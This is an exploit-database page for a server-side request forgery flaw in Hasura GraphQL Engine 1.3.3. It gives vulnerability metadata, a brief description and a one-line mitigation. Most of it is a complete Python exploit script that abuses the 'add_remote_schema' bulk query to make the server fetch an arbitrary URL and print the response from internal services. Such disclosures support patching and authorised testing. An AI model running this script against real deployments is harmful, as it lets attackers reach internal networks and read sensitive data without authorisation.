header-logo
Suggest Exploit
vendor:
GraphQL Engine
by:
Dolev Farhi
8.8
CVSS
HIGH
Service Side Request Forgery (SSRF)
918
CWE
Product Name: GraphQL Engine
Affected Version From: 1.3.3
Affected Version To: 1.3.3
Patch Exists: NO
Related CWE: N/A
CPE: a:hasura:graphql-engine
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Ubuntu
2021

Hasura GraphQL 1.3.3 – Service Side Request Forgery (SSRF)

Hasura GraphQL 1.3.3 is vulnerable to Service Side Request Forgery (SSRF). An attacker can exploit this vulnerability to send requests to internal services that are not accessible from the external network. This can be used to gain access to sensitive information or to perform other malicious activities.

Mitigation:

The best way to mitigate SSRF is to validate the user input and ensure that it is not pointing to any internal services.
Source

Exploit-DB raw data:

# Exploit Title: Hasura GraphQL 1.3.3 - Service Side Request Forgery (SSRF)
# Software: Hasura GraphQL
# Software Link: https://github.com/hasura/graphql-engine
# Version: 1.3.3
# Exploit Author: Dolev Farhi
# Date: 4/19/2021
# Tested on: Ubuntu

import requests

HASURA_SCHEME = 'http'
HASURA_HOST = '192.168.1.1'
HASURA_PORT = 80

REMOTE_URL = 'http://some_remote_addr'

def SSRF(url):
  data = {
    "type":"bulk",
    "args":[
      {
       "type":"add_remote_schema",
       "args":{
         "name":"test",
         "definition":{
           "url":url,
           "headers":[],
           "timeout_seconds":60,
           "forward_client_headers":True
           }
         }
       }
      ]
    }
  endpoint = '{}://{}:{}/v1/query'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT)
  r = requests.post(endpoint, json=data)
  return r.json()

res = SSRF(REMOTE_URL)

message = ''
raw_body = ''

try:
  if 'message' in res['internal']:
    message = res['internal'].get('message', '')
  if 'raw_body' in res['internal']:
    raw_body = res['internal'].get('raw_body', '')
except:
  pass

print('Remote URL: ' + REMOTE_URL)
print('Message: ' + message)
print('HTTP Raw Body: ' + raw_body)
print('Error: ' + res['error'])

Navigation

Suggest Exploit

Services By CQR